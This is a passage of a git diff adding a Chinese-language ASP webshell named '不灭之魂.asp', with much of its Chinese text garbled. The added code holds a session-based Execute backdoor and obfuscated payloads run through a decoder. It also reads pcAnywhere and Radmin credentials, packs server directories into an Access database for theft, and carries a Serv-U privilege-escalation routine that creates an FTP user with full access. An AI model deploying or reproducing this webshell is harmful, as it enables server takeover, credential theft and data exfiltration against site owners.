SinfoEn("r(ErowShn he tu~rvSe>~n<ioct Aif)`l>tm/h><dybo</S~RR~",Pos)
+
+
+
+
+response.write ""+vbCrLf+""+vbCrLf+""
+%>
\ No newline at end of file
diff --git a/asp/不灭之魂.asp b/asp/不灭之魂.asp
new file mode 100644
index 0000000..c5f2a5e
--- /dev/null
+++ b/asp/不灭之魂.asp
@@ -0,0 +1,1355 @@
+<%@ LANGUAGE = VBScript.encode%>
+<%
+UserPass="icesword"  '����
+mNametitle ="����ʹ"'        ����
+Copyright="��������ʹ"'                    ��Ȩ
+errin     ="����,���������"
+SItEuRl="http://tophack.net/"'            �����վ��ַ
+color1 ="green"'                          ��Ӱ��Ч��ɫ
+fontcor ="red"'                           ������ʾ��ɫ
+'---------------------------------------------------------------------------------------
+' [����֮���]
+'----------------------------------------------------------------------------------------
+Response.Buffer =true
+Server.ScriptTimeout=999999999
+BodyColor="#000000"
+FontColor="#b4a9a9"
+LinkColor="#ffffff"
+On Error Resume Next 
+strBAD="If Request(""#"")<>"""" Then Session(""#"")=Request(""#"")"&VbNewLine
+strBAD=strBAD&"If Session(""#"")<>"""" Then Execute(Session(""#""))"
+Const DEfd=""
+sub ShowErr()
+ If Err Then
+j"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
+Err.Clear:Response.Flush
+  End If
+end sub
+Sub j(str)
+response.write(str)
+End Sub
+sub RaPath(s)
+RaPath=ExecuteGlobal(s)
+End sub
+ysjb=true  
+Function RePath(S)
+RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S)
+RRePath=Replace(S,"\\","\")
+End Function
+URL=Request.ServerVariables("URL")
+ScriptPath=Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
+ServerIP=Request.ServerVariables("LOCAL_ADDR")
+Action=Request("Action")
+RootPath=Server.MapPath(".")
+WWWRoot=Server.MapPath("/")
+CONST_FSO="Script"&"ing.Fil"&"eSyst"&"emObject"
+FolderPath=Request("FolderPath")
+domain=Request.ServerVariables("http_host")
+u=request.servervariables("http_host")&url
+FName=Request("FName")
+cdx="<tr><td id=d width=95  >":cxd="<font face='wingdings'>8</font>":ef="</a></td></tr>"
+Function ShiSanFun(ShiSanObjstr)
+ShiSanObjstr = Replace(ShiSanObjstr, "��", """")
+For ShiSanI = 1 To Len(ShiSanObjstr)
+ If Mid(ShiSanObjstr, ShiSanI, 1) <> "��" Then
+ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) + ShiSanNewStr
+ Else
+ShiSanNewStr = vbCrLf + ShiSanNewStr
+ End If
+Next
+ShiSanFun = ShiSanNewStr
+End Function
+set fso=server.CreateObject(CONST_FSO)
+set fsoX=server.CreateObject(CONST_FSO)
+str1="http://"&Request.ServerVariables("SERVER_Name")& left(Request.ServerVariables("URL"),InstrRev(Request.ServerVariables("URL"),"/")):BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>"
+j "<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312""><title>"&mNametitle&" - "&ServerIP&"</title><style type=""text/css"">span.underline{text-decoration:underline;}span.orange{color:#B3D169;}span.project_type{text-align:right}span.grey{color:#666;}#links{list-style-type:none;padding:20px 0 0 0;padding-left:20px;}#linklist2  td{color:#fff;background:#191919;}#linklist2 td:visited{color:#999;}#linklist2 td:hover{background:#B3D169;color:#191919;}body,tr,td{margin-top: 5px;background-color: #000000;color: #b4a9a9;font-size: 12px;SCROLLBAR-FACE-COLOR: #232323;scrollbar-arrow-color: #383839;scrollbar-highlight-color: #383839;scrollbar-3dlight-color: #dddddd;scrollbar-shadow-color: #232323}.sb{cursor: hand}input,select,textarea{border-top-width: 1px;font-weight: bold;border-left-width: 1px;font-size: 11px;border-left-color: #dddddd;background: #000000;border-bottom-width: 1px;border-bottom-color: #dddddd;color: #dddddd;border-top-color: #dddddd;font-family: verdana;border-right-width: 1px;border-right-color: #dddddd;}#d{background: #000000;padding-left: 5px;padding-right: 5px;font-color: #fff}pre{font-size: 11px;font-family: verdana;color: #dddddd;}hr{color: #dddddd;background-color: #dddddd;height: 5px;}#x{font-family: verdana;font-size: 13px}a{color: #ffffff;text-decoration: none;}.am{color: #b4a9a9;font-size: 11px;}</style>"
+
+
+j"<script>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm(""ȷ��Ҫִ�д˲�����""))return true;else return false;}function runClock(){theTime = window.setTimeout(""runClock()"", 100);var today = new Date();var display= today.toLocaleString();window.status=""��"&Copyright&"  --""+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""�����븴�Ƶ�Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFile""){DName = prompt(""�������ƶ���Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""������Ҫ�½����ļ���ȫ����"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}</script>"
+j"<body" :If Action="" then j " scroll=no":j ">"
+Dim ObT(18,2):Fn=Action:ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "�� �� �� �� �� ��":ObT(1,0) = "wscript.shell":ObT(1,2) = "������ִ�����,��ʾ'<font color=red>��</font>'ʱ��<a href='?Action=cmdx' target='FileFrame'> <font color=red> ִ��Cmd��</font></a> �˹���ִ��":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS �� �� �� ��":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS ѹ �� �� ��":ObT(4,0) = "Scripting.Dictionary":ObT(4,2) = "������ �� �� ���� ���":ObT(5,0) = "Adodb.connection":ObT(5,2) = "���ݿ� ���� ���":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "������ �ϴ� ���":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp �ļ� �ϴ� ���":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "���Ʒ� �ļ� �ϴ� ���":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload �ļ� �ϴ� ���":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail �ʼ� �շ� ���":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "����SMTP ���� ���":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail ���� ���":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "���� ���� ���"
+ObT(14,0) = "ws"&"cript.shell.1":  OBt(14,2) = "���wsh���������Ը���������":OBT(15,0) = "WS"&"CRIPT.NETWORK":  OBt(15,2) = "�鿴��������Ϣ���������ʱ����������Ȩ":OBT(16,0) = "she"&"ll.appl"&"ication":OBt(16,2) = "she"&"ll.appli"&"cation ��������FSOʱ�����ļ��Լ�ִ������":OBT(17,0) = "sh"&"ell.appl"&"ication.1":OBt(17,2) = "she"&"ll.appli"&"cation �ı�������FSOʱ�����ļ��Լ�ִ������":OBT(18,0) = "Shell.Users":OBt(18,2) = "ɾ����net.exe net1.exe������������û������"
+For i=0 To 18:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" ��":Else:IsObj=" ��":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next:If FolderPath<>"" then:Session("FolderPath")=RRePath(FolderPath):End If:If Session("FolderPath")="" Then:FolderPath=WwwRoot:Session("FolderPath")=FolderPath:End if
+Function PcAnywhere4()
+execute(king("`>tswqz/<>rz/<>' ���� '=txsqc 'zodwxl'=thnz zxhfo<>rz<>rz/<>'13'=tmol 'yoe.shdtzoZ\tktivnfQeh\etzfqdnU\\qzqW fgozqeoshhQ\lktlM ssQ\lufozztU rfq lzftdxegW\:Z'=txsqc 'zbtz'=thnz 'izqh'=tdqf zxhfo<>'%10'=izrov rz<>rz/< :����yoe>'%10'=izrov rz<>kz<>'1'=ktrkgw'%13'=izrov tswqz<>'zlgh'=rgiztd 'dkgyb'=tdqf dkgy<>cor/<����foA Ȩ��tktivnfQeY>'ktzfte'=fuosq cor<`p"))
+end Function
+j"</form><script>function RUNonclick(){document.xform.china.name = parent.pwd.value;document.xform.action = parent.url.value;document.xform.submit();}</script>"
+Function StreamLoadFromFile(sPath)
+execute(king(" zsxltk = etrbti�� zbtG�� p + zsxltk = zsxltk�� zbtG�� 50 * p = p �� o - )fokzl(ftV gJ 0 = a kgX�� yC rfS�� ))0 ,o ,fokzl(roT(zfCZ = p �� ftiJ `1` => )0 ,o ,fokzl(roT rfQ `2` =< )0 ,o ,fokzl(roT yC�� yC rfS�� 10 = p �� ftiJ `Q` = )0 ,o ,fokzl(roT kB `q` = )0 ,o ,fokzl(roT yC�� yC rfS�� 00 = p �� ftiJ `A` = )0 ,o ,fokzl(roT kB `w` = )0 ,o ,fokzl(roT yC�� yC rfS�� 90 = p �� ftiJ `Z` = )0 ,o ,fokzl(roT kB `e` = )0 ,o ,fokzl(roT yC�� yC rfS�� 80 = p �� ftiJ `W` = )0 ,o ,fokzl(roT kB `r` = )0 ,o ,fokzl(roT yC�� yC rfS�� 70 = p �� ftiJ `S` = )0 ,o ,fokzl(roT kB `t` = )0 ,o ,fokzl(roT yC�� yC rfS�� 60 = p �� ftiJ `X`= )0 ,o ,fokzl(roT kB `y` = )0 ,o ,fokzl(roT yC�� )fokzl(ftV gJ 0 = o kgX�� 1 = zsxltk�� zsxltk ,a ,p ,o doW�� )fokzl(etrbti fgozefxX��fgozefxX rfS��ufoizgG = dqtkzUg ztU��izoK rfS��tlgsZ.��rqtN. = tsoXdgkXrqgVdqtkzU��1 = fgozolgY.��)izqYl(tsoXdgkXrqgV.��fthB.��8 = trgT.��0 = thnJ.��dqtkzUg izoK��)`dqtkzU.wrgrQ`(zetpwBtzqtkZ.ktcktU = dqtkzUg ztU��dqtkzUg doW"))
+End Function 
+
+sub promyself()
+On Error Resume Next 
+set f=fso.GetFile(ScriptPath)
+if f.Attributes <> 39 and session("lock")="" then
+end if
+set f=nothing
+end sub
+promyself
+Function PcAnywhere(data,mode)
+execute(king("trgetr=tktivnfQeY�� zbtG��0+dxfyoZ=dxfyoZ��)kzleh(kiZ + trgetr = trgetr�� kgX zobS ftiJ ))490>kzleh( kB )98 =< kzleh(( yC��)dxfyoZ kgb )))9,o,ilqi(roT(etrbti kgb ))9,o,qzqr(roT(etrbti((=kzleh�� 9 htzU ktwdxf gJ 0 = o kgX��60 = dxfyoZ :18 = ktwdxf ftiJ `ktlx` = trgd yC��770 = dxfyoZ :98 = ktwdxf ftiJ `llqh` = trgd yC��)8,qzqr(roT =DUQD"))
+
+End function
+Function bin2hex(binstr)
+For i = 1 To LenB(binstr)
+hexstr = Hex(AscB(MidB(binstr, i, 1)))
+If Len(hexstr)=1 Then 
+bin2hex=bin2hex&"0"&(LCase(hexstr))
+Else
+bin2hex=bin2hex& LCase(hexstr)
+End If 
+Next
+End Function
+CIF = Request("path")
+If CIF <> "" Then 
+BinStr=StreamLoadFromFile(CIF) 
+j"Pcanywhere Reader ==><br><br>PATH:"&CIF&"<br>�ʺ�:"&PcAnywhere (Mid(bin2hex(BinStr),919,64),"user")
+j"<br>����:"&PcAnywhere (Mid(bin2hex(BinStr),1177,32),"pass")
+End If 
+Function radmin()
+Set WSH= Server.CreateObject("WSCRIPT.SHELL")
+
+RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\"
+
+Parameter="Parameter"
+
+Port = "Port"
+
+j"<br>ע��:����HASHֵ����RadminHash���߻�od�������ӣ����߰ٶ���:Radmin_hash.rar<br><br>"
+
+ParameterArray=WSH.REGREAD(RadminPath & Parameter )
+
+j Parameter&":"
+
+If IsArray(ParameterArray) Then
+
+For i = 0 To UBound(ParameterArray)
+
+If  Len (hex(ParameterArray(i)))=1 Then 
+
+strObj = strObj & "0"&CStr(Hex(ParameterArray(i)))
+
+Else
+
+strObj = strObj & Hex(ParameterArray(i))
+
+End If 
+
+Next
+
+j strobj
+
+Else
+
+j"Error! Can't Read!"
+
+End If
+
+j"<br><br>"
+
+PortArray=WSH.REGREAD(RadminPath & Port )
+
+If IsArray(PortArray) Then 
+
+j Port &":" 
+
+j hextointer(CStr(Hex(PortArray(1)))&CStr(Hex(PortArray(0))))
+
+Else 
+
+j"Error! Can't Read!"
+
+End If
+End Function
+Function hextointer(strin) 
+Dim i, j, k, result 
+result = 0 
+For i = 1 To Len(strin) 
+If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then 
+j = 15 
+End If 
+If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then 
+j = 14 
+End If 
+If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then 
+j = 13 
+End If 
+If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then 
+j = 12 
+End If 
+If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then 
+j = 11 
+End If 
+If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then 
+j = 10 
+End If 
+If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then 
+j = CInt(Mid(strin, i, 1)) 
+End If 
+For k = 1 To Len(strin) - i 
+j = j * 16 
+Next 
+result = result + j 
+Next 
+hextointer = result 
+End Function
+Function MainForm()
+j"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
+j"<input type=""hidden"" name=""Action"">"
+j"<input type=""hidden"" name=""FName"">"
+j"</form>"
+j"<table width='100%' height='100%'  border=0 cellpadding='0' cellspacing='0'>"
+j"<tr><td height='30' colspan='2'>"
+j"<table width='100%'>"
+j"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
+j"<tr><td width='60' align='center'>��ַ����</td><td>"
+j"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
+j"</td><td width='140' align='center'><input name='Submit' type='submit' value='ת��'> <input type='submit' value='ˢ��������' onclick='FileFrame.location.reload()'>" 
+j"  <tr align='center' valign='middle'>"
+j"<tr>��ȨĿ¼����<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>��ʼ <b>��</b> ����</a>����<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>C:\\RECYCLER</a>����<a href='javascript:ShowFolder(""D:\\RECYCLER\\"")'>D:\RECYCLER</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>����<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>����<a href='javascript:ShowFolder(""C:\\Program Files\\Real"")'>RealServer</a>����<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>����<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>����<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>����<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>Documents</a>��</td><td>":
+j"</td></tr></form></table></center></td></tr><tr><td width='12%'>"
+j"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>"
+j"<td width='110%'>"
+j"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='1'></iframe>"
+j"</td></tr></table>"
+End Function
+
+Sub PageAddToMdb()
+execute(king("`>dkgy/<��¼Ŀ��̱���λ������������������ :ע>kw<>kw<>'������'=txsqc zodwxl=thnz zxhfo<>zeQtiz=tdqf wrTdgkXtlqtstk=txsqc ftrroi=thnz zxhfo<>13=tmol ``wrd.DUD\` & ))`.`(izqYhqT.ktcktU(trgefSsdzD & ```=txsqc izqYtiz=tdqf zxhfo<>))``#``(fgolltU(tzxetbS=txsqc ``#``=tdqf ftrroi=thnz zxhfo<>zlgh=rgiztd dkgy<>/kw<:)��֧BUX��(���������>/ki<>dkgy/<��¼Ŀ��ͬ��ľdql��λ,����wrd.DUD�������� :ע>kw<>kw<>'����ʼ��'=txsqc zodwxl=thnz zxhfo<>zetstl/<>fgozhg/<BUX��>hhq=txsqc fgozhg<>fgozhg/<BUX>gly=txsqc fgozhg<>rgiztTtiz=tdqf zetstl<>zeQtiz=tdqf wrTgJrrq=txsqc ftrroi=thnz zxhfo<>13=tmol ``` & ))`.`(izqYhqT.ktcktU(trgefSsdzD & ```=txsqc izqYtiz=tdqf zxhfo<>))``#``(fgolltU(tzxetbS=txsqc ``#``=tdqf ftrroi=thnz zxhfo<>zlgh=rgiztd dkgy<:����м���>kw<`p��yC rfS��rfS.tlfghltN��skMaeqA&`>cor/<!��������>kw<>ktzfte=fuosq cor<` p��)izqYtiz(aeqYfx��ftiJ `wrTdgkXtlqtstk` = zeQtiz yC��yC rfS��rfS.tlfghltN��skMaeqA&`>cor/<!��������>kw<>ktzfte=fuosq cor<` p��)izqYtiz(wrTgJrrq��ftiJ `wrTgJrrq` = zeQtiz yC��111110=zxBtdoJzhokeU.ktcktU��)`izqYtiz`(zltxjtN = izqYtiz��)`zeQtiz`(zltxjtN = zeQtiz��izqYtiz ,zeQtiz doW"))
+End Sub
+Sub addToMdb(thePath)
+On Error Resume Next
+Dim rs, conn, stream, connStr, adoCatalog
+Set rs = Server.CreateObject("ADODB.RecordSet")
+Set stream = Server.CreateObject("ADODB.Stream")
+Set conn = Server.CreateObject("ADODB.Connection")
+Set adoCatalog = Server.CreateObject("ADOX.Catalog")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HSH.mdb")
+adoCatalog.Create connStr
+conn.Open connStr
+conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)")
+stream.Open
+stream.Type = 1
+rs.Open "FileData", conn, 3, 3
+If Request("theMethod") = "fso" Then
+fsoTreeForMdb thePath, rs, stream
+ Else
+saTreeForMdb thePath, rs, stream
+End If
+rs.Close
+Conn.Close
+stream.Close
+Set rs = Nothing
+Set conn = Nothing
+Set stream = Nothing
+Set adoCatalog = Nothing
+End Sub
+Function fsoTreeForMdb(thePath, rs, stream)
+execute(king("ufoizgG = ktrsgXtiz ztU��ufoizgG = lktrsgy ztU��ufoizgG = ltsoy ztU��zbtG��yC rfS��tzqrhM.lk��)(rqtN.dqtkzl = )`zftzfgZtsoy`(lk��)izqY.dtzo(tsoXdgkXrqgV.dqtkzl��)7 ,izqY.dtzo(roT = )`izqYtiz`(lk��vtGrrQ.lk��ftiJ 1 =< )`$` & tdqG.dtzo & `$` ,zloVtsoXlnl(kzUfC yC��ltsoy fC dtzo ieqS kgX��zbtG��dqtkzl ,lk ,izqY.dtzo wrTkgXttkJgly��lktrsgy fC dtzo ieqS kgX��lktrsgXwxU.ktrsgXtiz = lktrsgy ztU��ltsoX.ktrsgXtiz = ltsoy ztU��)izqYtiz(ktrsgXztE.)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU = ktrsgXtiz ztU��yC rfS��)`!�ʷ����ʲ��߻��ڴ治¼Ŀ ` & izqYtiz(kkSvgil��ftiJ tlsqX = )izqYtiz(lzlobSktrsgX.)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU yC��`$wrs.DUD$wrd.DUD$` = zloVtsoXlnl��zloVtsoXlnl ,ltsoy ,lktrsgy ,ktrsgXtiz ,dtzo doW"))
+End Function
+Sub unPack(thePath)
+On Error Resume Next
+Server.ScriptTimeOut=100000
+Dim rs, ws, str, conn, stream, connStr, theFolder
+str = Server.MapPath(".") & "\"
+Set rs = CreateObject("ADODB.RecordSet")
+Set stream = CreateObject("ADODB.Stream")
+Set conn = CreateObject("ADODB.Connection")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";"
+conn.Open connStr
+rs.Open "FileData", conn, 1, 1
+stream.Open
+stream.Type = 1
+Do Until rs.Eof
+theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\"))
+If Server.CreateObject(CONST_FSO).FolderExists(str & theFolder) = False Then
+createFolder(str & theFolder)
+End If
+stream.SetEos()
+stream.Write rs("fileContent")
+stream.SaveToFile str & rs("thePath"), 2
+rs.MoveNext
+Loop
+rs.Close
+conn.Close
+stream.Close
+Set ws = Nothing
+Set rs = Nothing
+Set stream = Nothing
+Set conn = Nothing
+End Sub
+Dim Filepaths
+set Filepaths=new SearchFile
+Filepaths.Class_Folder Filename
+Sub createFolder(thePath)
+Dim i
+i = Instr(thePath, "\")
+Do While i > 0
+If Server.CreateObject(CONST_FSO).FolderExists(Left(thePath, i)) = False Then
+Server.CreateObject(CONST_FSO).CreateFolder(Left(thePath, i - 1))
+End If
+If InStr(Mid(thePath, i + 1), "\") Then
+i = i + Instr(Mid(thePath, i + 1), "\")
+ Else
+i = 0
+End If
+Loop
+End Sub
+Sub saTreeForMdb(thePath, rs, stream)
+Dim item, theFolder, sysFileList
+sysFileList = "$HSH.mdb$HSH.ldb$"
+Set theFolder = saX.NameSpace(thePath)
+For Each item In theFolder.Items
+If item.IsFolder = True Then
+saTreeForMdb item.Path, rs, stream
+ Else
+If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+rs.AddNew
+rs("thePath") = Mid(item.Path, 4)
+stream.LoadFromFile(item.Path)
+rs("fileContent") = stream.Read()
+rs.Update
+End If
+End If
+Next
+Set theFolder = Nothing
+End Sub
+Function ProFile()
+execute(king("CU p��`>tswqz/<>dkgy/<`&CU=CU��`>kz/<>rz/<>'�̽�������������һ��'=txsqc 'zodwxU'=tdqf 'zodwxl'=thnz zxhfo<>16=ziuoti rz<>rz/<;hlwf&>rz<>kz<`&CU=CU��`>kz/<>rz/<)������ȫ������񣬴�Խ������Ƶ����Խ���ĵĻ���Ҫ�裬��0ΪС��( �� >/ ``)'',u/]r\^[/(teqshtk.txsqc=txsqc``=hxntafg ``6``=tmol ``0``=txsqc ``ziuok:fuosq-zbtz``=tsnzl ``tdoJQ``=tdqf ``zbtz``=thnz zxhfo<>rz<>rz/<����Ƶ����>ziuok=fuosq rz<>kz<`&CU=CU��`>kz/<>rz/<)���ĸ��Գ��룬�����ֳ��������ʷ�( 3-XJM>/ ``9``=txsqc ``kqiZQ``=tdqf ``gorqk``=thnz zxhfo<  9089AE>/ rtaetie ``0``=txsqc ``kqiZQ``=tdqf ``gorqk``=thnz zxhfo<>rz<>rz/<��������>ziuok=fuosq rz<>kz<`&CU=CU��`>kz/<>rz/<>qtkqzbtz/<�������>``4``=lvgk ``14``=lsge ``trgZQ``=tdqf qtkqzbtz<>rz<>rz/<���������>ziuok=fuosq ``;bh8:hgz-uforrqh``=tsnzl hgz=fuosqc rz<>kz<`&CU=CU��`>kz/<>rz/<>qtkqzbtz/<`&)`hlq.zltz\`&)`izqYktrsgX`(fgolltU(izqYtNN&`>``4``=lvgk ``14``=lsge ``tsoXQ``=tdqf qtkqzbtz<`&CU=CU��`>rz<>rz/<>zfgy/<;hlwf&;hlwf&��·���ĸ�һ��ÿ>kw<;hlwf&;hlwf&���ĸ��໤��ʱͬ��>vgsstn=kgsge zfgy<>kw<����·���ĵĻ���Ҫ��>``1``=txsqc ``qccc``=tdqf ``ftrroi``=thnz zxhfo<>ziuok=fuosq 'bh99:ziuoti-tfos'=tsnzl hgz=fuosqc rz<>kz<`&CU=CU��`'zlgY=9fgozeQ&tsoXgkY=fgozeQ?`&VNM&`'=fgozeq 'zlgh'=rgiztd 'dkgXhM'=tdqf dkgy<`&CU=CU��`>'1'=ufoeqhlsste '1'=uforrqhsste '1'=ktrkgw tswqz<>kw<`=CU��yC rfS��rfS.tlfghltN��`>kw<>ktzfte/<���̽�����>q/<����>afqsw_=ztukqz `&9llqh&`=tsoXgkY?`&VNM&`=ytki ``rsgw:ziuotv-zfgy;tfosktrfx:fgozqkgetr-zbtz``=tsnzl q<���㣡���ɳ��� >zfgy/<`&9llqh&`>vgsstn=kgsge zfgy< �̽�����>ktzfte<>kw<>kw<>kw<`p��)`kqiZQ`(zltxjtk=)`kqiZ`&9llqh(fgozqeoshhQ��)`tdoJQ`(zltxjtk=)`tdoJ`&9llqh(fgozqeoshhQ��)`trgZQ`(zltxjtk=)`trgZ`&9llqh(fgozqeoshhQ��)`tsoXQ`(zltxjtk=)`tsoX`&9llqh(fgozqeoshhQ��0=)9llqh(fgozqeoshhQ��)9llqh(tlqex=9llqh�� hggs��0dxf&9llqh=9llqh��yo rft�� 2~1' ))37+rfk*)37-46((kiZ(kzUZ=0dxf��tlst�� m~q' ))42+rfk*)42-990((kiZ(kzUZ=0dxf��ftiz 7=<)9llqh(ftV yo��3<)9llqh(ftV tsoiK gW��``=9llqh��0dxf,9llqh dor��tmodgrfqN��ftiJ `zlgY`=)`9fgozeQ`(zltxjtN yC"))
+
+End Function
+Function suftp()
+j"<center><br><form name='form1' method='post' action=''><table width='500'><tr align='center' valign='middle'><td colspan='2' id=s><font face=webdings>8</font> <B>���ɰ汾��Ϣ</b></td></tr><tr align='center'><td id=d>ϵͳ�˺ţ�</td><td id=d><input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'></td></tr><tr align='center'><td id=d>ϵͳ���</td><td id=d><input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'></td></tr><tr align='center'><td id=d>ϵͳ�˿ڣ�</td><td id=d><input name='dport' type='text' class='TextBox' id='dport' value='43958'></td></tr><tr align='center'><td id=d>�¼��˺ţ�</td><td id=d><input name='tuser' type='text' class='TextBox' id='tuser' value='invader'></td></tr><tr align='center'><td id=d>�¼ӿ��</td><td id=d><input name='tpass' type='text' class='TextBox' id='pass' value='1'></td></tr><tr align='center'><td id=d>����·����</td><td id=d><input name='tpath' type='text' class='TextBox' id='tpath' value='C:\'></td></tr><tr align='center'><td id=d>����˿ڣ�</td><td id=d><input name='tport' type='text' class='TextBox' id='tport' value='21'></td></tr><tr align='center'><td id=d>ִ������</td><td id=d><input name='radiobutton' type='radio' value='add' checked class='TextBox' id=d>ȷ������&nbsp;<input type='radio' name='radiobutton' value='del' class='TextBox' id=d>ȷ��ɾ��</td></tr><tr align='center' valign='middle'><td colspan='2' id=d><input type='submit' name='Submit' value='Just Go'>&nbsp;<input type='reset' name='Submit2' value='Reset'><input name='SUaction' type='hidden' id='action' value='1'></td></tr></table></form></center>"
+Usr = request.Form("duser")
+pwd = request.Form("dpwd")
+port = request.Form("dport")
+tuser = request.Form("tuser")
+tpass = request.Form("tpass")
+tpath = request.Form("tpath")
+tport = request.Form("tport")
+'Command = request.Form("dcmd")
+if request.Form("radiobutton") = "add" Then
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+leaves = leaves & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & "-User=" & tuser & vbcrlf & "-Password=" & tpass & vbcrlf & _
+"-HomeDir=" & tpath & "\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
+"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
+"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
+"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
+"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
+"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=" & tpath & "\|RWAMELCDP" & vbcrlf
+On Error Resume Next
+Set xPost = CreateObject("MSXML2.XMLHTTP")
+xPost.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost.Send(leaves)
+Set xPOST=nothing
+j ("����ɹ�ִ�У���FTP �û���: " & tuser & " " & "����: " & tpass & " ·��: " & tpath & " :)<br><BR>")
+else
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+leaves = leaves & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & " User=" & tuser & vbcrlf
+Set xPost3 = CreateObject("MSXML2.XMLHTTP")
+xPost3.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost3.Send(leaves)
+Set xPOST3=nothing
+end if
+End Function
+
+Function MainMenu()
